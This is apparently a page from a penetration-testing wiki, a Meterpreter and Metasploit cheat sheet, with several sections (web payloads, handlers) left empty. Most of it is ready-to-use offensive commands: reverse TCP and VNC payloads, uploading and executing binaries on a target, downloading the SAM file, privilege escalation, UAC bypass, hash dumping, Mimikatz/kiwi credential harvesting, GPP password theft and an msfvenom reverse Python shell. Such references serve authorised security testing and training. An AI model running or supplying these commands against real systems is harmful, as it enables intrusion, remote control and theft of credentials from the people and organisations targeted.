Edit

๐ŸฎMeterpreter Cheat Sheet

Windows reverse meterpreter payload

  • set payload windows/meterpreter/reverse_tcp

    • Windows reverse tcp payload

Windows VNC Meterpreter payload

  • set payload windows/vncinject/reverse_tcp

    • Meterpreter Windows VNC Payload

  • set ViewOnly false

Linux Reverse Meterpreter payload

  • set payload linux/meterpreter/reverse_tcp

    • Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

  • upload file c:\\windows

    • Meterpreter upload file to Windows target

  • download c:\\windows\\repair\\sam /tmp

    • Meterpreter download file from Windows target

  • download c:\\windows\\repair\\sam /tmp

    • Meterpreter download file from Windows target

  • execute -f c:\\windows\temp\exploit.exe

    • Meterpreter run .exe on target โ€“ handy for executing uploaded exploits

  • execute -f cmd -c

    • Creates new channel with cmd shell

  • ps

    • Meterpreter show processes

  • shell

    • Meterpreter get shell on the target

  • getsystem

    • Meterpreter attempts priviledge escalation the target

  • hashdump

    • Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)

  • portfwd add โ€“l 3389 โ€“p 3389 โ€“r target

    • Meterpreter create port forward to target machine

  • portfwd delete โ€“l 3389 โ€“p 3389 โ€“r target

    • Meterpreter delete port forward

  • use exploit/windows/local/bypassuac

    • Bypass UAC on Windows 7 + Set target + arch, x86/64

  • use auxiliary/scanner/http/dir_scanner

    • Metasploit HTTP directory scanner

  • use auxiliary/scanner/http/jboss_vulnscan

    • Metasploit JBOSS vulnerability scanner

  • use auxiliary/scanner/mssql/mssql_login

    • Metasploit MSSQL Credential Scanner

  • use auxiliary/scanner/mysql/mysql_version

    • Metasploit MSSQL Version Scanner

  • use auxiliary/scanner/oracle/oracle_login

    • Metasploit Oracle Login Module

  • use exploit/multi/script/web_delivery

    • Metasploit powershell payload delivery module

  • post/windows/manage/powershell/exec_powershell

    • Metasploit upload and run powershell script through a session

  • use exploit/multi/http/jboss_maindeployer

    • Metasploit JBOSS deploy

  • use exploit/windows/mssql/mssql_payload

    • Metasploit MSSQL payload

  • run post/windows/gather/win_privs

    • Metasploit show privileges of current user

  • use post/windows/gather/credentials/gpp

    • Metasploit grab GPP saved passwords

  • load kiwi
  • creds_all

    • Metasploit load Mimikatz/kiwi and get creds

  • run post/windows/gather/local_admin_search_enum

    • Idenitfy other machines that the supplied domain user has administrative access to

  • set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

    • List options

Binaries

Web Payloads

    • PHP

    • Listener

    • PHP

    • ASP

    • JSP

    • WAR

Scripting Payloads

  • msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

    • Python

    • Bash

    • Perl

Shellcode

For all shellcode see โ€˜msfvenom โ€“help-formatsโ€™ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

An example is:

PreviousShells and Reverse Shells Cheat SheetNextPowershell Commands Cheat Sheet

Last updated

Was this helpful?